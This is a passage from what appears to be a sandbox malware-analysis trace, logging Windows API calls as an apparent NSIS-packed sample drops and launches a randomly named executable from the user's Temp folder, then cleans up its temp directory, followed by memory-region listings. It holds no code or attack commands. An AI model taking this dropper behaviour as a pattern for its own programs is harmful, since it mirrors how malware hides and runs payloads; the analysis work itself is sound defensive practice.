hFile=0x210, lpBuffer=0x19f3f0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x19f3f0*, lpNumberOfBytesRead=0x19f330*=0x4, lpOverlapped=0x0) returned 1 [0094.455] GetTickCount () returned 0x13f1695 [0094.455] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x890, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x890, lpOverlapped=0x0) returned 1 [0094.580] GetTickCount () returned 0x13f1712 [0094.580] MulDiv (nNumber=2192, nNumerator=100, nDenominator=2192) returned 100 [0094.580] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0094.580] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x1600, lpOverlapped=0x0) returned 1 [0094.581] GetTickCount () returned 0x13f1712 [0094.581] MulDiv (nNumber=2192, nNumerator=100, nDenominator=2192) returned 100 [0094.581] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0094.581] SetFileTime (hFile=0x28, lpCreationTime=0x19f6b8, lpLastAccessTime=0x0, lpLastWriteTime=0x19f6b8) returned 1 [0094.582] CloseHandle (hObject=0x28) returned 1 [0094.583] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0094.583] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0094.583] lstrcpynW (in: lpString1=0x428226, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0094.583] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0094.584] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg" [0094.584] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x426710*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f3d8 | out: lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg", lpProcessInformation=0x19f3d8*(hProcess=0x228, hThread=0x28, dwProcessId=0x3a0, dwThreadId=0x368)) returned 1 [0094.637] CloseHandle (hObject=0x28) returned 1 [0094.637] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0094.785] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0094.785] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0095.627] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0095.627] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0095.870] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0095.870] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0096.203] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0096.203] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0097.452] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0097.452] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0097.964] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0097.964] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0098.638] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0098.638] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0098.752] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0098.752] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0098.883] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0098.883] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0099.086] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0099.087] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0099.217] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0099.217] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0099.343] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0099.343] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0099.477] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0099.478] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0099.613] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0099.613] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0099.734] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0099.734] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0099.885] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0099.886] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0100.008] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0100.008] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x0 [0100.097] GetExitCodeProcess (in: hProcess=0x228, lpExitCode=0x19f3e4 | out: lpExitCode=0x19f3e4*=0x0) returned 1 [0100.097] CloseHandle (hObject=0x228) returned 1 [0100.097] DestroyWindow (hWnd=0x0) returned 0 [0100.097] EndDialog (hDlg=0x50288, nResult=0x0) returned 1 [0100.114] CloseHandle (hObject=0x210) returned 1 [0100.114] lstrcpynW (in: lpString1=0x425f10, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" [0100.114] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned 48 [0100.115] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsr155e.tmp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16f75961, ftCreationTime.dwHighDateTime=0x1d8605e, ftLastAccessTime.dwLowDateTime=0x16f75961, ftLastAccessTime.dwHighDateTime=0x1d8605e, ftLastWriteTime.dwLowDateTime=0x16f75961, ftLastWriteTime.dwHighDateTime=0x1d8605e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nsr155E.tmp", cAlternateFileName="")) returned 0x5fe3e0 [0100.115] FindClose (in: hFindFile=0x5fe3e0 | out: hFindFile=0x5fe3e0) returned 1 [0100.115] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned 48 [0100.115] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0100.115] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x17266e21, ftLastAccessTime.dwHighDateTime=0x1d8605e, ftLastWriteTime.dwLowDateTime=0x17266e21, ftLastWriteTime.dwHighDateTime=0x1d8605e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x5fe3e0 [0100.116] FindClose (in: hFindFile=0x5fe3e0 | out: hFindFile=0x5fe3e0) returned 1 [0100.116] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0100.116] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local") returned 31 [0100.116] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x5fe5e0 [0100.116] FindClose (in: hFindFile=0x5fe5e0 | out: hFindFile=0x5fe5e0) returned 1 [0100.116] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local") returned 31 [0100.117] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData") returned 25 [0100.117] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x5fe1e0 [0100.117] FindClose (in: hFindFile=0x5fe1e0 | out: hFindFile=0x5fe1e0) returned 1 [0100.117] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData") returned 25 [0100.117] lstrlenW (lpString="C:\\Users\\RDHJ0C~1") returned 17 [0100.117] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x5fe560 [0100.118] FindClose (in: hFindFile=0x5fe560 | out: hFindFile=0x5fe560) returned 1 [0100.118] lstrlenW (lpString="C:\\Users\\RDHJ0C~1") returned 17 [0100.118] lstrlenW (lpString="C:\\Users") returned 8 [0100.118] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5fe6e0 [0100.118] FindClose (in: hFindFile=0x5fe6e0 | out: hFindFile=0x5fe6e0) returned 1 [0100.118] lstrlenW (lpString="C:\\Users") returned 8 [0100.119] lstrlenW (lpString="C:") returned 2 [0100.119] lstrlenW (lpString="C:") returned 2 [0100.119] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0100.119] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0100.119] lstrcpynW (in: lpString1=0x425710, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" [0100.119] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp\\*.*") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp\\*.*" [0100.119] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp\\" [0100.119] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp\\") returned 49 [0100.119] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsr155e.tmp\\*.*"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16f75961, ftCreationTime.dwHighDateTime=0x1d8605e, ftLastAccessTime.dwLowDateTime=0x16f75961, ftLastAccessTime.dwHighDateTime=0x1d8605e, ftLastWriteTime.dwLowDateTime=0x16f75961, ftLastWriteTime.dwHighDateTime=0x1d8605e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x755f6b08, dwReserved1=0x755f6e7e, cFileName=".", cAlternateFileName="")) returned 0x5fe5e0 [0100.119] FindNextFileW (in: hFindFile=0x5fe5e0, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16f75961, ftCreationTime.dwHighDateTime=0x1d8605e, ftLastAccessTime.dwLowDateTime=0x16f75961, ftLastAccessTime.dwHighDateTime=0x1d8605e, ftLastWriteTime.dwLowDateTime=0x16f75961, ftLastWriteTime.dwHighDateTime=0x1d8605e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x755f6b08, dwReserved1=0x755f6e7e, cFileName="..", cAlternateFileName="")) returned 1 [0100.119] FindNextFileW (in: hFindFile=0x5fe5e0, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16f75961, ftCreationTime.dwHighDateTime=0x1d8605e, ftLastAccessTime.dwLowDateTime=0x16f75961, ftLastAccessTime.dwHighDateTime=0x1d8605e, ftLastWriteTime.dwLowDateTime=0x16f75961, ftLastWriteTime.dwHighDateTime=0x1d8605e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x755f6b08, dwReserved1=0x755f6e7e, cFileName="..", cAlternateFileName="")) returned 0 [0100.119] FindClose (in: hFindFile=0x5fe5e0 | out: hFindFile=0x5fe5e0) returned 1 [0100.120] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsr155e.tmp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16f75961, ftCreationTime.dwHighDateTime=0x1d8605e, ftLastAccessTime.dwLowDateTime=0x16f75961, ftLastAccessTime.dwHighDateTime=0x1d8605e, ftLastWriteTime.dwLowDateTime=0x16f75961, ftLastWriteTime.dwHighDateTime=0x1d8605e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nsr155E.tmp", cAlternateFileName="")) returned 0x5fe060 [0100.120] FindClose (in: hFindFile=0x5fe060 | out: hFindFile=0x5fe060) returned 1 [0100.120] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned 48 [0100.120] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp\\" [0100.120] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsr155e.tmp")) returned 0x10 [0100.120] SetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp\\", dwFileAttributes=0x10) returned 1 [0100.120] RemoveDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsr155e.tmp")) returned 1 [0100.121] OleUninitialize () [0100.125] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x314 Thread: id = 3 os_tid = 0x264 Thread: id = 4 os_tid = 0x390 Process: id = "2" image_name = "rysgtozci.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rysgtozci.exe" page_root = "0x73e7c000" os_pid = "0x3a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf90" cmd_line = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 364 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 365 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 366 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 367 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 368 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 369 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 370 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 371 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 372 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 373 start_va = 0x400000 end_va = 0x404fff monitored = 1 entry_point = 0x401000 region_type = mapped_file name = "rysgtozci.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rysgtozci.exe") Region: id = 374 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 375 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 376 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 377 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 378 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 379 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 380 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 381 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 382 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 383 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 384 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 385 start_va = 0x4d0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 386 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 387 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 388 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 389 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 390 start_va = 0x4d0000 end_va = 0x58dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 391 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 392 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 393 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 394 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 395 start_va = 0x76ed0000 end_va = 0x76f14fff monitored = 0 entry_point = 0x76eede90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 396 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 397 start_va = 0x410000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 398 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 399 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 